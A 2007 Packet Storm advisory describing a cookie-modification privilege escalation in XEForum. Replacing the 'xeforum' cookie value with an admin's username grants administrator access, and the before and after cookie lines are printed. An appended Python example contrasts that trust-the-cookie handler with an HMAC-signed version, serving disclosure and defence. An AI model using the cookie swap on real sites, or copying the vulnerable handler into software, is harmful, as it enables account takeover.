xeforum-privesc.txt

2007-06-30T00:00:00
ID PACKETSTORM:57371
Type packetstorm
Reporter Firewall
Modified 2007-06-30T00:00:00

Description

                                        
--------------------------------------------------------------------  
XEForum Cookie Modification Privilege Escalation Vulnerability  
--------------------------------------------------------------------  
  
Vulnerable product: XEForum  
Vendor: http://www.xeforum.com/  
  
Date:  
--------------------  
Found: Jun 26, 2007  
  
Vulnerability:  
--------------------  
XeForum contains a flaw that may allow a remote attacker to gain administrative privileges.  
By modifying the cookie the forum sets, you can switch to another user's session and even log in as the administrator.  
  
Cookie:  
-----------------------------------  
: Cookie: xeforum="Your Username" :  
-----------------------------------  
change to:  
------------------------------------  
: Cookie: xeforum="Admin Username" :  
------------------------------------  
  
Credit:  
--------------------  
Firewall  
Firewall of Peru  
Firewall@hotmail.com  
Greetz to Swp-Scene And Revolutionz  
http://4firewall.uni.cc  
--------------------------------------------------------------------  
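The flaw class described above, as an added example (not XEForum's code and not from the advisory's author): a handler that takes the `xeforum` cookie value as the logged-in user, beside a hardened form that accepts only a value carrying a server-computed MAC. The function names, key handling and token layout are assumptions; only the cookie name comes from the advisory.

```python
import base64
import hashlib
import hmac
import secrets
import time

SERVER_KEY = secrets.token_bytes(32)  # assumption: per-deployment secret, never sent to clients
MAX_AGE = 3600                        # assumption: one-hour session lifetime


def legacy_current_user(cookies):
    """Behaviour the advisory describes: the cookie value *is* the identity."""
    return cookies.get("xeforum")


def _mac(payload):
    return hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()


def issue_cookie(username, now=None):
    """Bind username and expiry together with an HMAC only the server can compute."""
    expiry = int(now if now is not None else time.time()) + MAX_AGE
    user_b64 = base64.urlsafe_b64encode(username.encode()).decode()
    payload = f"{user_b64}.{expiry}"
    return f"{payload}.{_mac(payload)}"


def hardened_current_user(cookies, now=None):
    """Return the username only if the cookie is intact and unexpired, else None."""
    parts = cookies.get("xeforum", "").split(".")
    if len(parts) != 3:
        return None  # a bare username such as "admin" is rejected here
    user_b64, expiry, mac = parts
    expected = _mac(f"{user_b64}.{expiry}")
    # Constant-time comparison; any edit to username or expiry changes the MAC.
    if not hmac.compare_digest(mac.encode(), expected.encode()):
        return None
    if int(expiry) < (now if now is not None else time.time()):
        return None
    return base64.urlsafe_b64decode(user_b64).decode()
```

A random server-side session ID mapped to the user record is an equally valid fix; what matters is that the client cannot choose the identity the server acts on.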